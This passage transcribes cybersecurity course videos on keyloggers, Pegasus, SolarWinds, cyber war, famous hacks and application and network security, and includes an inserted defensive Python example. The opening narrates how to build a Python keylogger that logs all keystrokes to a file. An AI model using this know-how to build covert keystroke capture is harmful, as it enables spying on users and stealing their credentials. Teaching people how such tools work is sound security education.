Now that we have some understanding about the topic of keyloggers, let's take a look at the demo to further increase our knowledge about the topic. For the first step, we have to download some of the important libraries that are required on the system, which is this library. Now we'll run it; the system says the library is already installed on the system. Now let's take a look at what exactly the modules are that are required from the particular library. From this library we will import the keyboard module, which will help us to record the data that we type on the keyboard; now, from the same, we'll also import the Key module and the Listener module, and also the logging module, which will help us to record the data into a log file. For the next part, we'll write a piece of code that will allow us to save the data that is recorded by the program into our text file
that will be named key_log.txt, along with the date and timestamp. Let's take a look. Now we'll provide it with the file name, which will be given as key_log.txt, and also the part where the format of the data is recorded; the brackets over here contain the file name. Now we'll write the format in which the data will be recorded into the log file, which would be the timestamp and the message, given as the asctime field followed by the message field, and ending it with the bracket. Now, for the next step, we will design two functions that will be used in the program, which will be termed the while_press function and the while_release function. Let's take a look. The while_press function would be a function that will come into play when a keyboard key has been pressed, and this would go for the format that we designed in the above line, logging the pressed key info as a string to be recorded into the log file. Now we'll design a function, while_release, that will come into play when the Escape key has been pressed; that is, the program will terminate itself and stop running. And in the end, for the functioning of the program, we require these functions, while_press and while_release, to loop in a continuous cycle: on_press will go to while_press and on_release will contain the while_release function, as the listener, and now this part would join the different threads and store them into the log file. Now that we have completed the code for the program, let's run it. We have to wait for a moment so the program runs. Now, to verify the program, let's open Notepad, and on the Notepad we'll write hello world, which will be the basic test of whether the program is working or not. Let's take a look: we will go to the main page on the Jupyter notebook and refresh the page; go to the bottom, and over here we see key_log.txt, the text file that we created. Let's open it, and over here we have
the data that was created as we started with Notepad, and then this is the hello world part that we created just now, which shows that the program we created is working properly. Now that we have reached the end of the module, let's take a look at the summary. Firstly, we learned what exactly keyloggers are; then we understood what different modes are present by which the system gets infected with the keylogging problem; then we learned how to detect the problem on our system; then we learned what different types of keyloggers are present on the net; we also understood how hackers use the recorded data from the program; and we also learned whether mobile devices get infected with the keylogging problem or not; and lastly, we understood what different points can be taken to prevent the entering of the keylogging problem into the system.

Before we learn about the Pegasus platform, let us understand what spyware is and its working. Spyware is a category of malware that can gather information regarding a user or a device straight from the host machine. It is mostly spread by malicious links via email or chat applications; when a link with the malware is received, clicking on this link will activate the spyware, which allows the hacker to spy on all our user information. But in some spyware systems, even clicking on the link isn't necessary to trigger the malicious payload. This can ultimately cause security complications and further loss of privacy. One such spyware system that is making the rounds in the tech industry today is Pegasus. Pegasus is a spyware system developed by an Israeli company known as the NSO Group. It runs mainly on mobile devices, spanning across the major operating systems like Apple's iOS on the iPhone and the standard Android versions. This is not a newly developed platform, since Pegasus has existed since as early as 2016: a highly intricate spyware program that can track user location, read text messages, scan through mobile files, and access the device camera and microphone to record voice
and video. Pegasus has all the tools necessary to enforce surveillance for any client that wishes to buy its services. Initially, the NSO Group had designed the software to be used against terrorist factions of the world; with more and more encrypted communication channels coming to the forefront, Pegasus was designed to maintain control over data transmission that can be a threat to national security. Unfortunately, the people who bought the software had complete control over who, how, and up to what level they can put surveillance limits on. Eventually, the primary clients became sovereign nations; spying on public information that is supposed to stay private became really easy with this service. Multiple devices can be affected with the same spyware system to create a network of information; this network keeps feeding data to the host. To understand how a network can be created, let's know how a mobile device can be affected by Pegasus. We all communicate with friends and family over instant messaging applications and email. In some instances, if you check your inbox on a regular basis, you must have noticed that we receive some spam emails that mail providers like Gmail and Yahoo can just filter into the spam folder. Some of these messages bypass this filter and make their way into a person's inbox; they look like generic emails which are supposed to be safe. The Pegasus spyware targets such occurrences, by passing malicious messages and links which install the necessary spy software on the user's mobile device, be it Android or an iPhone. This isn't unique to the email ecosystem, since it's equally likely to be targeted by SMS texts, WhatsApp, Instagram or even the most secure messaging apps like Signal and Threema. Once the malicious links are clicked, a spyware package is downloaded and installed on the device. After the spyware is successfully installed, the perpetrator who sent the payload to the victim can monitor everything the user does. Pegasus can collect private emails, passwords,
images, videos and every other piece of information that passes through the device network. All this data is transmitted back to the central server, where the primary spying organization can monitor the activities at a granular level. This is not even surface level, since complex spyware software like Pegasus can access the root files on our mobiles; these root files hold information that is crucial to the working of the Android and iOS operating systems. Taking such private information is a massive blow to the security and the privacy of an individual; the information that may seem trivial, like the name of your Wi-Fi connection or the last time you ordered an item from Amazon, is indeed all valuable information. This exploitation is primarily possible due to zero-day vulnerabilities, known as bugs in the software development process. The zero-day bugs are the ones that have just been discovered by some independent security company or a researcher. Once they are found, reporting these vulnerabilities to the developer of the platform, which would be either Google for Android or Apple for iOS, is the right thing to do; however, many such critical bugs make their way onto the dark web, where hackers can use them to create exploits. These exploits are then sent to innocent users with a link or a message, like we had discussed before. Pegasus was able to affect the latest devices with all the security patches installed, but some bugs are not reported to the developers or just cannot be fixed without breaking some core functionality; these become the gateway for spyware to enter the system. You can never be 100% safe, but you sure can give it your all in protecting yourself. The one thing where Pegasus stands out is its zero-click action feature. Usually, in spam emails, the malicious code is activated when the user clicks the malware link; a user doesn't need to click the link in the new version of Pegasus and a few other spyware programs. Once the message arrives in the inbox of
WhatsApp, Gmail or any other chat application, the spyware gets activated, and everything can be recorded and sent back to the central server. The primary issue with being affected by spyware as a victim is detection. Unlike crypto miners and Trojans, spying services usually do not demand many system resources, which makes them tough to detect after they have been activated. Since many devices slow down after a couple of years, any kind of performance hit due to such spyware is often attributed to poor software longevity by the users; they do not check meticulously for any other causes of the slowdown. When left unchecked, these devices can capture voice and video from the mobile sensors while keeping the owner in the dark. Let's take a moment to check if we are well aware of the causes of such attacks. How do users fall prey to such spyware programs? A, by installing untested software; B, by clicking on third-party links from emails and messages; C, by not keeping the apps and phones updated; or D, all of the above. Let us know your answers in the comment section below, and we will reveal the correct answer next week. But what about the unaffected devices, the vulnerable ones? While we cannot be certain of our security, there are a few things we can do to boost our device, be it against Pegasus or the next big spyware on the market. Let's say we are safe now and we have the time to take the necessary steps to prevent a spyware attack; what are the things we can go for? A primary goal must always be to keep our apps and the operating system updated with the latest security patches. The vulnerabilities that the exploits target are often discovered by developers from Google and Apple, which send the security patches quickly. This can be done for individual apps as well, so keeping them updated is of utmost importance. While the most secure devices have fallen prey to Pegasus as well, a security patch from developers may help in minimizing the damage at a later stage, or maybe negate
the entire spyware platform altogether. Another big factor in the spread of malware is the trend of sideloading Android applications using .apk files; downloading such apps from a third-party website has no security checks involved, and they are mostly responsible for adware and spyware infections on user devices. Avoiding the sideloading of apps would be a major step in protecting yourself. We often receive spam emails or texts from people we may not know on social media; they are accompanied by links that allow malware to creep into a device. You should try to follow trusted websites and not click on any links that redirect us to unknown domains. Spyware is a controversial segment in governance; while the ramifications are pretty extreme in theory, it severely impacts user privacy. Against authoritarian regimes, sufficient resources and a contingency plan can alter the false veil of democracy altogether. Even if our daily life is rather simplistic, we must understand that privacy is not about what we have to hide; instead, it portrays the things we have to protect. It stands for everything we have to share with the outside world, both rhetorically and literally.

Hey everyone, today we look at the hack which took the world by storm and affected multiple governments and corporations: the SolarWinds attack. The global statistics indicate that upward of 18,000 customers have been affected, potentially needing billions to recover the losses incurred. Before we have a look at this hack, make sure to subscribe to our channel and hit the notification bell to never miss an update from Simplilearn. The date is December 8th, 2020.
FireEye, a global leader among companies specializing in cyber security, released a blog post that got the attention of the entire IT community: a software known as Orion, which was developed by SolarWinds Incorporated, had become a victim of a remote access Trojan, or RAT. The breach was estimated to have been running since the spring of 2020 and went virtually unnoticed for months. The reveal sent the developers of the Orion software into a frenzy, as they quickly released a couple of hotfixes for their platform in order to mitigate this threat and prevent further damage. But how did this come into existence? We first need to understand the platform which was responsible for this breach. SolarWinds, a software company based in Texas, United States, had developed a management platform known as Orion, catering to corporations and governments worldwide. Orion was responsible for the monitoring and management of IT administration; this included managing the client's servers, virtualization components and even the network infrastructure of the organization that bought the platform. SolarWinds claims they have more than 300,000 clients, including U.S. government agencies and several Fortune 500 companies. This entire chain can be classified as a supply chain attack. In this variant of cyber crime, the hackers target relatively weaker links in an organization's chain of control and delivery; these are preferably services rendered by a third party, since there is no direct jurisdiction over them. In this case, the Orion platform was the primary target; the culprit, however, was software updates. The update server for SolarWinds Orion had a malicious version attached with malware, or a Trojan to be precise. This was made possible since the code repository that handled the software updates was breached. Once the update server repository was compromised, the source code of the applications became open to modification, and malicious code found its way onto the software. A remote access Trojan was attached to a potential
update nicknamed the Sunburst update. This update gave hackers backdoor access to any client that used the correct version on its release. Many clients believed the update to be legitimate, since it came from the right source and they had no reason to believe otherwise. American government agencies were supposedly hit the hardest, as the list of victims included the U.S. Departments of Homeland Security, Treasury and Health; several private companies like Cisco, Nvidia and Intel were compromised, according to a list published by the cyber security firm TruSec. Most of the companies had issued quick updates to fix the vulnerabilities introduced by the software. While the actual perpetrators have never been found, it is believed that this was an act of cross-border corporate espionage conducted by state-sponsored hackers, either from Russia or China. Before we move forward, let's take a recap of the things we learned. Which category of malware was responsible for the SolarWinds hack? Was it (1) a virus, (2) a remote access Trojan, (3) spyware, or (4) a worm? Let us know your answers in the comment section right away, and we will reveal the correct answer in a week. Coming to possible reparations, the Biden government has launched a full investigation into the effects and the repercussions of this breach. There are a couple of things that we as consumers must always tend to when working our way through the World Wide Web. Using a password manager is highly recommended, which can generate secure alphanumeric passwords. You must also use different passwords for different accounts, thereby reducing the chance of a single point of failure should one of those accounts get breached. Usage of two-factor authentication applications is also encouraged, since it acts as a safety net if hackers directly get hold of our credentials. Clicking on unknown links transmitted via email is also a strict no, as is installing applications from unverified sources. The SolarWinds hack is estimated to cost the parent company nearly 18
million dollars in reparations, making it one of, if not the biggest hacks in cyberspace history. As recently as July 2021, the hackers accessed some U.S. attorneys' Microsoft 365 email accounts as part of the attack. Crime investigation organizations like the FBI and CIA are determined to figure out the culprits responsible for this debacle; however, the intricacy and the full extent of the breach make it a way more complicated job than it looks on paper.

The day is 26 February 2022. The world is hit with breaking news that Russian state TV channels have been hacked by Anonymous, a hacktivist collective and movement who have made a name taking part in multiple cyber wars in the past decade. This was in response to the Russian aggression on Ukrainian territory in the hopes of annexation. Anonymous hacked the Russian state TV networks to combat propaganda in Russia and highlight the damage to life meted out by the Kremlin in Ukraine. They also hacked the personal information of 120,000 Russian troops and the Russian Central Bank, stealing 35,000 files. This served as a clear indicator of how cyber war can change the momentum in battle, something which people had never seen so closely. So what is cyber war? A digital assault, or series of strikes or hacks, against a country is sometimes referred to as a cyber war. It has the ability to cause havoc on government and civilian infrastructure, as well as disrupt essential systems, causing state harm and even death. In this day and age, the internet plays a bigger role than just watching videos and learning content; it is where you have your personal data and carry out financial transactions. So rather than resorting to physical violence, cyber wars become the new means to cause havoc, considering the vulnerability of the data passing through the internet. In most circumstances, cyber warfare involves one nation-state attacking another; in certain cases, the assaults are carried out by terrorist organizations or non-state actors pursuing a hostile nation's aims. In June 2021,
Chinese hackers targeted organizations like Verizon to secure remote access to their networks. Stuxnet was a computer worm designed to attack Iran's nuclear facilities, but it evolved and expanded to many other industrial and energy-producing sites in 2010. Since the definition of cyber war is so vague, defining rules and sanctions based on digital assault is even tougher, making the field of cyber warfare a lawless land not bound by any rules or policies. There are multiple ways in which these attacks can be carried out. A major category of cyber attack is espionage. Espionage entails monitoring other countries to steal critical secrets; this might include compromising vulnerable computer systems with botnets or spear-phishing attempts before extracting sensitive data in cyber warfare. The next weapon in cyber war is sabotage. Government agencies must identify sensitive data and the dangers if it is exploited; insider threats, such as disgruntled or irresponsible personnel, or government staff with ties to the attacking country, can be used by hostile countries or terrorists to steal or destroy information. By overwhelming a website with bogus requests and forcing it to handle them, denial-of-service attacks prohibit real users from accessing it; attacking parties may use this form of assault to disrupt key operations and systems and prevent citizens, military and security officials and research organizations from accessing sensitive websites. But what benefits does cyber war offer in contrast to traditional physical warfare? The most important advantage is the ability to conduct attacks from anywhere globally without having to travel thousands of miles; as long as the attacker and target are connected to the internet, organizing and launching cyber wars is relatively less tedious than physical warfare. People living in or battling for a country are subjected to propaganda attacks in an attempt to manipulate their emotions and thoughts. Digital infrastructure is highly crucial in today's
modern world, starting from communication channels to secure storage servers; crippling a country's footprint and control on the internet is very damaging. But what are some of the ways we as citizens can protect ourselves in the case of a cyber war? In the unfortunate event that your country is involved in warfare, be sure to fact-check every piece of information and follow only trusted sources. In that frame of time, even conversations online should be limited to a need-to-know basis, considering propaganda campaigns have the power to influence the tide of war drastically. It is highly crucial to follow basic security guidelines to secure our devices, like regularly updating our operating systems, occasionally running full-system antivirus scans, etc. If your country or organization is being attacked, having devices segregated in a network goes a long way in bolstering security. Try to avoid sharing a lot of personal data online; in this era of Instagram and Facebook, divulging private information can be detrimental to keeping a secure firewall for your data. The more information an attacker has access to, the higher his chances of being able to devise a plan to infiltrate defenses. In this video, we bring you the top 10 computer hacks of all time. But before we begin, if you're new here and haven't subscribed already, make sure to hit the subscribe button and the bell icon for interesting tech videos every day. Let's see what we have at number 10.
From April 27, 2007, Estonia, the European country, faced a series of cyber attacks that lasted for weeks. This happened when the Estonian government decided to move the Bronze Soldier from Tallinn's center to a less prominent military cemetery located on the city's outskirts. Unprecedented levels of internet traffic took down Estonian banks' online services, media outlets, broadcasters and government bodies. Botnets sent massive waves of spam and vast amounts of automated online requests; according to researchers, the public faced DDoS attacks. There were conflicts to edit the English-language version of the Bronze Soldier's Wikipedia page as well. Although there is no confirmation, Russia is believed to be behind these cyber attacks that largely crippled Estonian society. Let's now move on to the next attack. On December 23, 2015, several parts of Ukraine witnessed a power outage, and this was not a typical blackout; it was indeed the result of a cyber attack. Information systems of three energy distribution companies in Ukraine were compromised. It is the first known successful cyber attack on a power grid. It is said that here hackers sent spear phishing emails to the power companies; 30 substations were switched off and about 230,000 people were left in the dark for about one to six hours. U.S. investigators believed that Russia-based hackers were responsible for this. Experts have warned that other countries could also be vulnerable to such attacks. Let's see what we have at number eight. In the year 1999, a cyber attack caused a 21-day shutdown of NASA computers. Unbelievable, isn't it? The hacker was none other than the then 15-year-old Jonathan James. He first penetrated U.S. Department of Defense division computers and installed a back door on its servers. This allowed him to intercept more than a thousand government emails, including the ones containing usernames and passwords. This helped James steal a piece of NASA software and crack the NASA computers that support the International Space
Station, which cost the space exploration agency $41,000 as systems were shut down for three weeks. He was the first person to carry out a computer hack against the American space agency. Let's now move on to the next attack. In late November 2014, there was a leak of confidential data from the film studio Sony Pictures. Information about Sony Pictures employees, their emails, copies of then-unreleased Sony films, future propositions and other crucial data were leaked. This cyber attack was carried out by a hacker group named Guardians of Peace. So what did the hackers want? Well, they demanded that Sony withdraw its then-upcoming movie The Interview. This movie was a comedy with a storyline to assassinate the North Korean leader Kim Jong-un. Sony then decided to cancel the film's theatrical release due to their threats at cinemas screening the movie. It is indeed hard to trace the roots of a cyber attack; in this case, after evaluation, U.S. intelligence officials arrived at the theory that the attack was in a way related to the government of North Korea. However, North Korea denied the same. Moving on to our number six. In December 2006, TJX, the U.S. retailer company, identified that 45.6 million debit and credit card details were stolen. This happened from one of its systems over 18 months by an unknown number of intruders. It was one of the first largest-ever cyber attacks involving the loss of personal data; as a result, banks in the affected regions had to reissue and block thousands of payment cards. A group of hackers did this, Albert Gonzalez being the mastermind. The group was from Miami, the place where the TJX heist was believed to have originated. Reports said that the TJX data breach occurred because of weak WEP encryption at two of its Marshalls stores in Miami. Next, moving on to our top five. Let us see what we have at number five. The year 2010 witnessed the discovery of the deadly computer worm Stuxnet. This malware's motive was unlike any other usual cyber
attacks: it aimed at destroying the equipment the computers controlled. Stuxnet came with the deadly purpose of damaging Iran's nuclear infrastructure. It infected more than 200,000 computers, including 14 industrial sites and a uranium enrichment plant in Iran. Stuxnet initially spread via Microsoft Windows and targeted Siemens industrial control systems. Although it was discovered only in 2010, it is believed to have been silently sabotaging Iran's nuclear facilities. It was one of the first discovered malware that was capable of hampering hardware systems; it largely damaged the centrifuges of the Iranian reactors. This is believed to be a cyber weapon created by the US and Israeli intelligence, although there is no documented evidence or acceptance by either of the countries for the same. Moving on to number four. In the year 2014, Home Depot was the victim of one of the deadliest cyber attacks: 56 million payment cards were compromised, along with 53 million customer email addresses stolen. This security breach happened from April to September 2014.
Criminals were believed to have used a third-party vendor's username and password to enter the perimeter of Home Depot's network. The attackers were then able to deploy custom-built malware on its self-checkout systems in the US and Canada. Moving on to our top three. As you might be aware, the PlayStation gaming system is one of Sony's most popular products. Unfortunately, in April 2011, Sony executives witnessed abnormal activity on the PlayStation Network. This resulted in the compromise of approximately 77 million PlayStation user accounts and prevented users of PlayStation 3 and PlayStation Portable consoles from accessing the service. This forced Sony to turn off the PlayStation Network on April 20th. On May 4th, Sony confirmed that personally identifiable information from each of the 77 million accounts had been exposed. The outage lasted for 23 days; Sony released almost daily announcements concerning the system outage. In the end, Sony is believed to have invested approximately 170 million dollars to improve the network security, to investigate the attack, and to cover the expenses of caring for the consumers that had been affected. Let's now move on to the next attack, at number two. In May 2017, one of the most dangerous cyber attacks took place. It was known as the WannaCry ransomware attack, caused by the WannaCry crypto worm. The victims were the users that used unsupported versions of Microsoft Windows and those who hadn't installed the new security update. This did not take place through phishing like other attacks but through an exposed, vulnerable SMB port. The attack originated in Asia and then eventually spread across the globe. In a day, more than 200,000 computers were infected across 150 countries. The WannaCry crypto worm locked the users out of their targeted systems and encrypted their data. The users were asked for a ransom of 300 to 600 dollars, which had to be paid via Bitcoin, in exchange for their data. This attack took a toll on both private and government
organizations. It resulted in damages from hundreds of millions to billions of dollars. In a matter of a few days, the emergency patches released by Microsoft halted the attack; also, the discovery of a kill switch prevented the infected computers from spreading the crypto worm. Security experts in a few countries believed that North Korea was behind this attack. And finally, let's see what we have at number one. More than two decades ago, in March 1999, the Melissa virus, a mass-mailing macro virus, was released. It targeted Microsoft Word and Outlook-based systems and created considerable network traffic. The Melissa virus infected computers via emails. The email would look like an important message; well, yes, it was fake. If the recipient opened the attachment in the mail, downloaded the document and then opened it with Microsoft Word, a virus was released on their computer. This would then mass-mail itself to the first 50 people in the victim's contact list and then disable multiple safeguard features in Microsoft Word and Microsoft Outlook. This began spreading like wildfire across the internet. David L. Smith released the virus. The virus caused nearly 80 million worth of damages. It did not steal data or money; however, it caused havoc. Almost 1 million email accounts were disrupted worldwide, agencies were overloaded and some had to be shut down entirely, and internet traffic in some locations was slowed down. Security was traditionally considered an afterthought in software development. It is becoming an increasingly important concern for all aspects of app development, from design to deployment and beyond. The number of programs produced, distributed, deployed and patched across networks continually increases; as a result, application security features must deal with a wide range of risks. Let's take an example. A malicious script may be mirrored on the victim's web browser or kept in a database and run whenever the user contacts the proper function, depending on the kind of attack in question. Here, this
allows malicious code to be entered in the case of an output. The major cause of this attack is faulty user input validation, which allows malicious input to enter the final output. An evil user can enter a script that will be injected into the website's code; the browser will then be unable to determine whether the processed code is harmful. As a result, a malicious script is performed on the victim's browser, or a bogus form is shown to the users. Are you aware of which attack this is? If not, do stay till the end of the video to find the correct answer. Hey everyone, welcome to today's video on application security. Before we move forward, subscribe to our channel and hit the bell icon to never miss an update from us. Let's take a look at the topics to be covered today. We start by learning about application security and its different types. We learn about the most common vulnerabilities in AppSec, followed by the importance of application security in today's cyber security space. Next, we cover some attacks against application layer security and end the video with protection techniques to enforce application security parameters. So let's start by learning about application security from a grassroots perspective. Application security, which is often known as AppSec, protects application software from external security threats by utilizing security software, hardware, methodologies, best practices and different processes. Organizations require application security technologies that safeguard all of their programs, from internal to popular external apps on consumer mobile phones. These solutions must address the whole development cycle and provide testing after an application has been deployed to detect possible issues. An application security mechanism is capable of testing web pages for possible and exploitable vulnerabilities, analyzing code and assisting the administration of development and safety
management processes. The testing solutions must also be simple and easy to install for system administrators. Worldwide, consumers utilize hundreds of applications daily to access theoretically important and favored services such as e-commerce, banking, music, etc. To be productive, professionals use a variety of software solutions as well, ranging from online word checkers to tablet-based creative tools, among other things. Back-end software, of course, exists to automate essential operations and processes and decrease human labor. But to make matters worse, the quantity and complexity of these apps and their back-end code is increasing. The software security problem 10 years ago was about securing desktop apps and static web pages that were natively harmless and easy to scan through and define. Because of outsourced development, the number of legacy programs, and in-house development that uses third-party, open-source and commercial off-the-shelf software modules, the software supply chain has become considerably more convoluted. Now that we understand application security on a general level, let us go through some of the different categories for the types of application security. The three major types to be covered in this section are web application security, API security and cloud-native application security. A web application is a program available on the internet, and it operates on a web server; the client is accessed using a web browser. The applications by definition must allow connections from clients across unsecured networks. This exposes them to a variety of risks. Many online apps are mission-critical and include sensitive customer data, making them an attractive target for attackers and a top concern for any cyber security program or framework. The advent of HTTPS, which offers an encrypted channel of communication and guards against man-in-the-middle attacks, or MITM attacks, has addressed several online application weaknesses. Many weaknesses, though, still persist. Many security
providers have created solutions specifically geared to safeguard online applications in response to the rising challenge of web application security. A web application firewall is an example of a security technology meant to identify and prevent application layer assaults in the case of web applications. When it comes to APIs, API security flaws are the root of many major data breaches. They have the potential to reveal sensitive data and disrupt vital corporate processes. API security flaws include insufficient authentication, unintended data disclosure, and a failure to apply rate restriction, which allows API abuse. The requirement for API security, like the necessity for web application security, led to the creation of sophisticated equipment that can discover API vulnerabilities and protect APIs at the production level. The third type is cloud-native application security. Infrastructure and environments are often built up automatically in cloud-native apps, depending on declarative configuration, which is known as infrastructure as code, or IaC. Developers are tasked with developing declarative settings and application code, both of which should be secure. Because practically everything is defined during the development stage, shifting left is even more crucial in cloud-native setups. Traditional testing techniques can help cloud-native apps, but they are insufficient; dedicated cloud-native security solutions are mandatory at this point in time, which are capable of instrumenting containers, container clusters and serverless operations, reporting on security concerns and providing developers with a quick feedback loop. Now that you have covered the different types of application security, let us go through some of the most common vulnerabilities that these frameworks face on a daily basis. First is cryptographic failure: when data is not adequately safeguarded in transit and at rest, it is classed as a cryptographic failure, formerly known as sensitive data exposure. It has the
potential to reveal credentials, health information, credit card details and personal information as well, depending on the type of data being protected in that particular case. Next, injection attacks: attackers can use injection vulnerabilities to convey malicious information to a web application interpreter. It has the potential to assemble and execute this data on the server. SQL injection is a popular type of injection, which I've already covered in the introduction of this video. Another major vulnerability is outdated components. Vulnerable and outdated components encompass any vulnerability caused by obsolete or unmaintained software. It can happen if you construct or even use an application without first learning about its core components and versions. Authentication failures: identification and authentication failures, which were previously known as broken authentication, encompass any security issue involving user identities. Identity attacks and exploitation may be avoided by implementing secure session administration, authentication and validation for all identities in the organization. In the next section, let us cover some of the protection mechanisms employed by cyber security firms and third-party automated software to prevent the application layer from being bombarded with SQL injections and other attacks. The first is a web application firewall, or WAF. A web application firewall monitors and filters HTTP traffic between a web application and the World Wide Web. Web application firewall architecture does not address all risks, but it may be used in conjunction with other defense mechanisms; it can be added to the portfolio of security solutions to provide a comprehensive defense against diverse attack vectors. It is a protocol layer 7 protection in the Open Systems Interconnection, or OSI, model paradigm that helps defend online applications against attacks such as cross-site scripting, cross-site request forgery, SQL injection and file inclusion. Unlike a proxy server, which conceals
the identity of client computers by acting as an intermediary, a WAF functions as a reverse proxy, shielding the server from exposure. It acts as a barrier in front of a web application, protecting it from the internet, so clients must pass through the web application firewall before they can access the application. The second is threat assessment. A list of sensitive assets to safeguard will assist you in understanding the threats to your firm and how to minimize them, considering how a hacker can infiltrate an application if existing security protections are in place and whether additional tools or defense capabilities are required. It's also crucial to keep your security expectations in check; nothing is impenetrable, even with the most stringent security measures. It would be best if you were realistic about what you believe your team can handle in the long term; when pushed too aggressively, safety regulations and procedures might be disregarded. Remember that safety is a lengthy and time-taking project that requires the collaboration of other employees and sometimes even your customers. The next topic is privilege management. Limiting privileges is vital, especially for mission-critical and sensitive systems. The least privilege principle states that access to programs and data should be limited to those who require them, when they require them. For two reasons, the least privilege principle is absolutely critical. The first is that hackers may compromise less privileged accounts, and ensuring they do not acquire access to highly sensitive systems is critical. The second is that internal threats are equally harmful as external adversaries; if insiders go bad, it's critical to ensure they never have more power than they need, minimizing the harm that they may be able to cause to the organization. Network security is a set of technologies that protects the usability and integrity of a company's infrastructure by preventing the entry or proliferation of threats within a network. Its architecture comprises tools
that protect the network itself and the applications that run over it. Effective network security strategies employ multiple lines of defense that are scalable and automated. Each defensive layer here enforces a set of security policies which are determined by the administrator beforehand. This aims to secure the confidentiality and accessibility of the data and the network. Every company or organization that handles a large amount of data has a degree of solutions against many cyber threats. The most basic example of network security is password protection, where the user chooses the password for the network. Recently, network security has become the central topic of cyber security, with many organizations inviting applications from people with skills in this area. It is crucial for both personal and professional networks. Most houses with high-speed internet have one or more wireless routers, which can be vulnerable to attacks if they are not adequately secured. Data loss, theft and sabotage may be decreased with the usage of a strong network security system. The workstations are protected from hazardous spyware thanks to network security. Additionally, it guarantees the security of the data which is being shared over a network by dividing information into various sections, encrypting these portions and transferring them over separate pathways. Network security infrastructure offers multiple levels of protection to thwart man-in-the-middle attacks, preventing situations like eavesdropping, among other harmful attacks. It is becoming increasingly difficult in today's hyper-connected environment as more corporate applications migrate to both public and private clouds. Additionally, modern applications are also frequently virtualized and dispersed across several locations, some outside the physical control of the IT team. Network traffic and infrastructure must be protected in these cases, since assaults on businesses are increasing every single day. We now understand the basics of network security.
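The layered model just described, where every defensive layer enforces a policy the administrator set beforehand, and the split the course goes on to make between authentication (who you are) and authorization (what your role may do), can be shown as a small request pipeline. The code is an added example and is not from the video or from Simplilearn. The network segments, users, roles and passwords are constructed for illustration; storing passwords as salted PBKDF2 hashes and denying any action a role does not list are design choices of this example, not something the course specifies.

```python
"""Layered network-security checks: network policy, then authentication,
then authorization (added example; every name and value below is constructed)."""
import hashlib
import hmac
import ipaddress

PBKDF2_ROUNDS = 100_000

# Layer 1: administrator-defined policy. Each internal segment lists the
# source networks that may reach it (constructed allow-list).
SEGMENT_POLICY = {
    "office-lan": [ipaddress.ip_network("10.0.0.0/8")],
    "server-vlan": [ipaddress.ip_network("10.1.0.0/16")],
}

# Layer 3: role -> permitted actions. Anything not listed is denied,
# which is the least-privilege default.
ROLE_PERMISSIONS = {
    "admin": {"read", "write", "configure"},
    "analyst": {"read"},
}


def make_password_record(password: str, salt: bytes) -> dict:
    """Store only a salted PBKDF2 hash, never the password itself."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return {"salt": salt, "hash": digest}


def verify_password(record: dict, attempt: str) -> bool:
    """Recompute the hash and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", attempt.encode(), record["salt"], PBKDF2_ROUNDS)
    return hmac.compare_digest(digest, record["hash"])


# Constructed user directory: username -> (password record, role).
# Fixed salts keep the example reproducible; a real system draws them from os.urandom.
USERS = {
    "alice": (make_password_record("correct horse battery staple", b"salt-alice-0001"), "admin"),
    "bob": (make_password_record("hunter2", b"salt-bob-000002"), "analyst"),
}


def network_allowed(src_ip: str, segment: str) -> bool:
    """Layer 1: is the source address inside a network permitted for this segment?"""
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in SEGMENT_POLICY.get(segment, []))


def authenticate(user: str, password: str) -> bool:
    """Layer 2: verify the claimed identity against the stored hash."""
    entry = USERS.get(user)
    if entry is None:
        # Do the same amount of work for unknown users so timing does not
        # reveal which usernames exist.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"dummy-salt-00000", PBKDF2_ROUNDS)
        return False
    return verify_password(entry[0], password)


def authorize(user: str, action: str) -> bool:
    """Layer 3: allow only actions the user's role explicitly lists."""
    role = USERS[user][1]
    return action in ROLE_PERMISSIONS.get(role, set())


def handle_request(src_ip: str, segment: str, user: str, password: str, action: str) -> str:
    """Run the layers in order; the first layer that fails stops the request."""
    if not network_allowed(src_ip, segment):
        return "denied: network policy"
    if not authenticate(user, password):
        return "denied: authentication"
    if not authorize(user, action):
        return "denied: authorization"
    return "allowed"


if __name__ == "__main__":
    # Constructed requests: (source IP, target segment, user, password, action)
    sample_requests = [
        ("10.1.4.7", "server-vlan", "alice", "correct horse battery staple", "configure"),
        ("10.1.4.7", "server-vlan", "bob", "hunter2", "configure"),
        ("10.1.4.7", "server-vlan", "bob", "wrong-password", "read"),
        ("203.0.113.5", "server-vlan", "alice", "correct horse battery staple", "read"),
    ]
    for req in sample_requests:
        print(f"{req[2]:6} {req[4]:10} from {req[0]:12} -> {handle_request(*req)}")
```

Each decision names the layer that rejected the request, which is what a network administrator needs when tuning the policies described above: a denial at the network layer means the segment allow-list did its job before any credential was even examined, while a denial at the authorization layer shows least privilege holding for an authenticated but under-privileged user.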
But we need to understand how network security works, in the next section, in slightly more detail. Network security revolves around two processes: authentication and authorization. The first process, authentication, is similar to access passes which ensure that only those who have the right to enter a building can do so. In other words, authentication checks and verifies that it is indeed a user belonging to the network who is trying to access or enter it, thereby preventing unauthorized intrusions. Next comes authorization. This process decides the level of access provided to the recently authenticated user. For example, a network admin needs access to the entire network, whereas those working within it probably need access to only certain areas within the network. Based on the network user's role, the process of determining the level of access or permission level is known as authorization. Today's network architecture is complex and faces a threat environment that is always changing, and attackers that are always trying to find and exploit vulnerabilities. These vulnerabilities can exist in many areas, including devices, data, applications, users and locations. For this reason, many network security management tools and applications are in use today that address individual threats. When just a few minutes of downtime can cause widespread disruption and massive damage to an organization's bottom line and reputation, it is essential that these protection measures are in place beforehand. Now that we know a little about network security and its working, let's compare the different types of network security. The fundamental tenet of network security is the layering of protection for massive networks and stored data that ensures the acceptance of rules and regulations. There are three types, the first of which is physical security, the next being technical and the third being administrative. Let's look into physical security first. This is the most basic level, which includes protecting
